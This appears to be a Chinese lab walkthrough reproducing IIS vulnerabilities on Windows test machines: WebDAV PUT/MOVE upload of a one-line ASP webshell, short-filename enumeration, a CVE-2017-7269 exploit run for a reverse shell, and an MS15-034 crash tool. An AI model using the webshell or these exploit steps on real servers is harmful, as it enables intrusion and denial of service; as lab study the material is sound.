IIS漏洞再现

一、IIS任意文件上传漏洞

1、安装Windows2003

2、设置

3、浏览访问Windows2003的IP

访问成功

4、抓包,上传木马

注意里面的PUT和MOVE都必须是大写

在当前页抓包用PUT方式上传一个1.txt文件,内容是木马

<%eval request("cmd")%>

可以看到201上传成功

接下来把1.txt的内容移动到IP下的1.asp

访问木马

成功访问到

5、用蚁剑测试连接

二、IIS短文件漏洞

1、原理

当后缀小于4时,短文件名产生需要文件(夹)名前缀字符长度大于等于9位

当后缀大于等于4时,文件名前缀字符长度即使为1,也会产生短文件名

2、特征

(1)只显示前6位的字符,后续字符用~1代替。其中数字1是可以递增。如果存在文件名类似的文件,则前面的 6个字符是相同的,后面的数字进行递增

(2)后缀名最长只有3位,超过3位的会生成短文件名,且后缀多余的部分会截断。

(3)所有小写字母都会转换成大写字母

(4)长文件名中包含多个"."的时候,以文件最后一个"."作为短文件名的后缀

(5)长文件名前缀/文件夹名字符长度符合0-9和A-Z、a-z范围且需要大于等于9位才会生成短文件名,如果包含空格或者其他部分特殊字符,不论长度均会生成短文件。

3、验证

在win2003的网站目录下新建一个长文件名abcdefghijk.txt,内容写上123

在本机浏览器测试我们刚刚创建的文件,如果是404,则说明存在此短文件名

首先*~1*肯定存在,因为*代表任意位数的字符,在这里表示前六位字符

当我们访问*a~1*时,没返回404,说明不存在这个短文件,因为我们的文件名设置的是abcdefghijk.txt,第一个字符是a

当我们访问a*~1*时,返回404,说明存在,而这也和我们创建的文件名相对应

以此类推就能推测出短文件名

短文件漏洞就是这样用的

三、IIS RCE-CVE-2017-7269

1、在kali上传一个工具

地址:GitHub - g0rx/iis6-exploit-2017-CVE-2017-7269: iis6 exploit 2017 CVE-2017-7269

2、运行工具

用python2运行

python2 文件的绝对路径 要攻击的地址 端口 反弹到哪里的地址 端口

3、再开一个终端,监听我们刚刚开的端口

4、反弹shell成功

5、执行命令

四、HTTP.SYS远程代码执执漏洞

1、打开Windows server2012

2、访问IP

3、下载工具

在kali下载工具,地址:https://github.com/davidjura/MS15-034-IIS-Active-DoS-Exploit-PoC

4、使用工具

cd 进入工具

运行工具

接下来工具要什么我们给什么

第一个是要攻击目标的IP

第二个是要端口

第三个是要攻击目标的路径里有的文件

而我们攻击的目标只能访问到一个图片,不知道他的路径,那么就在网页上点鼠标右键,复制图像链接,粘贴出来就可以看到了

继续运行

返回Windows2012看一下

刚刚已经把我的Windows2012打关机了,这是自动开机以后得状态

5、这样就成功了

相关推荐
宇钶宇夕24 分钟前
EPLAN 电气制图:建立自己的部件库,添加部件-加SQL Server安装教程(三)上
运维·服务器·数据库·程序人生·自动化
susu10830189111 小时前
Debian 11 Bullseye 在线安装docker
运维·docker·debian
love530love1 小时前
Docker 稳定运行与存储优化全攻略(含可视化指南)
运维·人工智能·windows·docker·容器
岁岁岁平安1 小时前
CentOS-7-x86_64解决:使用NAT模式无法ping通www.baidu.com或无法ping 8.8.8.8问题。
linux·运维·centos·centos-7
运维小贺2 小时前
各服务器厂商调整BIOS睿频教程
linux·运维·服务器·性能优化
网硕互联的小客服2 小时前
如何排查服务器中已经存在的后门程序?
运维·服务器·github
人生匆匆2 小时前
docker进入启动失败的容器
运维·docker·容器
Fanmeang2 小时前
OSPF路由过滤
运维·网络·华为·ip·路由·ospf·路由过滤
★Orange★2 小时前
Linux Kernel kfifo 实现和巧妙设计
linux·运维·算法
NetX行者2 小时前
FastMCP:用于构建MCP服务器的开源Python框架
服务器·python·开源